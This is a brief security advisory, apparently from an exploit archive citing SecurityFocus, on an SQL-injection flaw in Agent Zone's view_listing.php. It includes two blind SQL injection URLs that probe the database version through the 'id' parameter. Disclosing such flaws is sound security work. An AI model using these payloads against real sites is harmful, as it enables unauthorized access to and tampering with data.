8 lines
No EOL
538 B
Text
8 lines
No EOL
538 B
Text
source: https://www.securityfocus.com/bid/36503/info
|
|
|
|
Agent Zone is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
|
|
|
http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=5 True
|
|
http://www.example.com/real/view_listing.php?id=4+and+substring(@@version,1,1)=4 False |